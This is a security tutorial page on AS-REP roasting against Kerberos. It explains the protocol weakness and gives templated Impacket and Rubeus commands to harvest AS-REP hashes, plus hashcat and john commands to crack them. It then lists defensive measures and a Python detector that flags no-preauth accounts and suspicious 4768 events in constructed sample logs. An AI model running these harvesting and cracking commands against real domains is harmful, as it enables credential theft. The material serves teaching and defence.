# AS-REP Roasting

### Overview

AS-REP roasting is an attack on the Kerberos authentication protocol that takes advantage of a weakness that can be exploited during initial authentication with a Key Distribution Center (KDC). It allows a malicious actor to retrieve the password hash of any Kerberos user account that has the *Do not require Kerberos preauthentication* option enabled.

What we have: a user account with any privilege level.

What we acquire: credentials for another user whose account "**doesn't require pre-authentication**".

### About AS-REP

AS-REP is a Kerberos message type that refers to an "Authentication Service" (AS) response message. It is transmitted between a Kerberos server and client as part of the exchange of credentials needed to access a service. To generate an AS-REP message, the Kerberos client first asks the Key Distribution Center (KDC) for a Ticket Granting Ticket (TGT) and a session key, which are needed to obtain credentials for other services.

Obtaining the TGT involves two messages: an AS\_REQ sent from the client to the Kerberos server and an AS\_REP, which is sent in response to the AS\_REQ. Once the ticket granting ticket has been issued, service tickets can be requested.

The AS-REP message contains the TGT and a session key which is used to request access to the intended service. The session key is encrypted with the requesting user's password (more precisely, with a key derived from it). AS-REP roasting attacks extract this encrypted portion and crack it offline, revealing the requesting account's password.

### How to Exploit?

#### 1. Scan for user accounts that don't require pre-authentication

With the [Impacket](https://github.com/SecureAuthCorp/impacket) example `GetNPUsers.py`: "attempt to harvest the non-preauth AS\_REP responses for a given list of usernames."

```
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

With [Rubeus](https://github.com/GhostPack/Rubeus):

```
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
```

#### 2. Cracking with a password dictionary

```
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>
```

### Protections from AS-REP Roasting

* **Identify accounts that do not require preauthentication.** The obvious protection against this type of attack is to find and remove any user accounts that are set to not require Kerberos preauthentication.
* **Password strength.** Another strong protection against this type of attack is to use long, complex passwords that will not be found in breached-password dictionaries. Fine-grained password policies, especially for privileged accounts, are a good first step. For additional protection against commonly breached passwords, you can look at Enterprise Password Enforcer.
* **AD privileges.** It is also important to understand which users have privileges over your AD user accounts and can enable this UAC value, since it can be enabled just long enough to obtain the AS-REP hash and then turned off again.
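The first and third protections above, written out as an added example (this is not code from the original page or from either tool it mentions): a test of the userAccountControl bit behind the "Do not require Kerberos preauthentication" checkbox, and a detector that flags Security event 4768 entries matching what the harvesting step leaves behind (a successfully issued TGT with pre-authentication type 0 and an RC4 ticket). The event bodies are constructed samples, trimmed to the relevant fields.

```python
import re

# userAccountControl bit behind "Do not require Kerberos preauthentication"
DONT_REQ_PREAUTH = 0x400000
# Ticket encryption type recorded in event 4768 for RC4-HMAC, the type roasting tools ask for
RC4_HMAC = 0x17
FIELDS = ("Account Name", "Client Address", "Ticket Encryption Type",
          "Pre-Authentication Type", "Result Code")

def dont_req_preauth(user_account_control):
    """True when an account's userAccountControl has the no-preauth bit set."""
    return bool(user_account_control & DONT_REQ_PREAUTH)

def parse_4768(event_text):
    """Pull the fields of interest out of a 4768 message body.
    Labels follow the Windows Security log layout; missing fields are skipped."""
    fields = {}
    for name in FIELDS:
        m = re.search(rf"{re.escape(name)}:\s*(\S+)", event_text)
        if m:
            fields[name] = m.group(1)
    return fields

def is_asrep_roast_candidate(fields):
    """A successfully issued TGT, no pre-authentication, RC4 ticket: the shape
    GetNPUsers.py / Rubeus asreproast leave behind in the log."""
    etype = fields.get("Ticket Encryption Type", "0")
    return (fields.get("Result Code") == "0x0"
            and fields.get("Pre-Authentication Type") == "0"
            and etype.startswith("0x") and int(etype, 16) == RC4_HMAC)

def find_suspicious(events):
    """Parsed fields of every event matching the roasting pattern."""
    return [f for f in map(parse_4768, events) if is_asrep_roast_candidate(f)]

# Constructed sample 4768 bodies (not real log data), trimmed to the relevant lines.
SAMPLE_EVENTS = [
    # ordinary AES TGT with timestamp pre-auth (type 2): benign
    "Account Name: alice\nClient Address: ::ffff:10.0.0.5\n"
    "Ticket Encryption Type: 0x12\nPre-Authentication Type: 2\nResult Code: 0x0",
    # no pre-auth, RC4 ticket, success: roast candidate
    "Account Name: svc-backup\nClient Address: ::ffff:10.0.0.77\n"
    "Ticket Encryption Type: 0x17\nPre-Authentication Type: 0\nResult Code: 0x0",
    # unknown principal, request failed: ignore
    "Account Name: nobody\nClient Address: ::ffff:10.0.0.77\n"
    "Ticket Encryption Type: 0xffffffff\nPre-Authentication Type: -\nResult Code: 0x6",
]
```

Accounts whose userAccountControl passes `dont_req_preauth` are the ones the first bullet says to find and fix; a burst of 4768 hits from one client address is the pattern to alert on.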

### Resources

* <https://stealthbits.com/blog/cracking-active-directory-passwords-with-as-rep-roasting/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* <https://www.youtube.com/watch?v=EVdwnBFtUtQ>
